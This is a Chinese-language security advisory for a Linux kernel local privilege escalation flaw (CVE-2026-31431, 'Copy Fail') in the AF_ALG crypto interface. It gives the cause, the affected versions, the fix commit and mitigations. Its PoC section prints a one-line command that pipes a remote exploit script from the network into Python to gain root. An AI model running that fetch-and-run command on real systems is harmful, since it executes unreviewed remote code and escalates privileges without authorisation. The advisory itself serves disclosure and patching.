Linux内核Copy Fail本地权限提升漏洞(CVE-2026-31431)
漏洞简介
漏洞编号:CVE-2026-31431
漏洞名称:Copy Fail Linux内核本地权限提升漏洞
公开时间:2026-04-29
漏洞类型:本地权限提升
漏洞等级:严重
产品简介
Linux内核是开源的操作系统核心,是绝大多数主流服务器、嵌入式设备、个人计算机操作系统的核心基础,负责硬件管理、资源调度和核心系统功能支撑。AF_ALG是Linux内核提供给用户空间访问内核加密API的套接字接口,默认开启在几乎所有主流Linux发行版的官方配置中。
官网/仓库地址:
https://www.kernel.org
漏洞描述
该漏洞是Xint Code扫描Linux内核加密子系统发现的逻辑漏洞,2017年algif_aead原地优化更新时引入,静默存在了近十年。漏洞成因是authencesn模块存在逻辑缺陷,允许页缓存页落入可写的目标散列表,攻击者可通过链式利用AF_ALG接口与splice()系统调用实现4字节页缓存任意写入。利用该漏洞仅需要一个无特权的本地普通用户账户,不需要竞争窗口、内核特定偏移、网络访问或额外前置利用原理,且100%可靠,同一732字节的利用脚本无需修改即可稳定提权,覆盖所有2017年以来发布的主流Linux发行版。成功利用后攻击者可从普通用户直接获取root权限,也可作为容器逃逸原理实现跨租户越权,在共享宿主机、K8s集群、CI runner等场景危害极大。
影响范围
受影响版本:Linux kernel 所有2017年引入问题代码后未应用修复补丁的版本,覆盖几乎所有2017年以来发布的主流Linux发行版内核不受影响版本:Linux kernel 包含主修复提交a664bf3d603d的版本
漏洞 POC
官方公开POC仓库:https://github.com/theori-io/copy-fail-CVE-2026-31431快速验证命令(仅可在授权测试环境执行):curl https://copy.fail/exp | python3 && suPoC文件SHA256:a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9说明:732字节纯Python标准库实现,支持Python 3.10+,默认攻击/usr/bin/su,可指定其他setuid二进制作为攻击目标
修复与自查
官方修复方案:Linux内核官方已经提交修复补丁(主提交号a664bf3d603d),各大主流Linux发行版已经发布对应内核安全更新,用户可通过系统包管理器升级内核到包含该修复的版本即可。
临时缓解措施:
- 无法立即升级内核时可禁用algif_aead模块,执行以下命令: echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf && rmmod algif_aead 2>/dev/null || true
- 对于容器、沙箱、不可信工作负载场景,通过seccomp禁用AF_ALG套接字创建。
自查建议:
- 若您的Linux内核构建时间在2017年至2026年4月1日补丁发布前,且未更新过内核,则大概率受影响;
- 检查当前内核是否包含修复提交a664bf3d603d即可确认是否修复。
参考链接
[1]https://nvd.nist.gov/vuln/detail/CVE-2026-31431[2]https://copy.fail/[3]https://github.com/theori-io/copy-fail-CVE-2026-31431